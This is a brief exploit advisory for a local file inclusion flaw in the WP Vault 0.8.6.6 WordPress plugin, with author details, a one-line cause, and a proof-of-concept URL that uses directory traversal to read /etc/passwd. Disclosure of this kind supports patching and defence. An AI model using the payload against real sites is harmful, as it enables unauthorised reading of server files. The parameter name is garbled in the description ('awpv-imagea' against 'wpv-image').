WordPress WP Vault 0.8.6.6 Local File Inclusion
Posted on 01 December 2016
# Exploit Title: WP Vault 0.8.6.6 a Plugin WordPress a Local File Inclusion # Date: 28/11/2016 # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/wp-vault/ # Software Link: https://wordpress.org/plugins/wp-vault/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 0.8.6.6 # Tested on: Ubuntu 14.04 1 - Description: $_GET[awpv-imagea] is not escaped in include file. http://lenonleite.com.br/en/blog/2016/11/30/wp-vault-0-8-6-6-local-file-inclusion/ 2 - Proof of Concept: http://Target/?wpv-image=[LFI] http://Target/?wpv-image=../../../../../../../../../../etc/passwd 3 - Timeline: 12/11/2016 - Discovered 12/11/2016 - vendor not found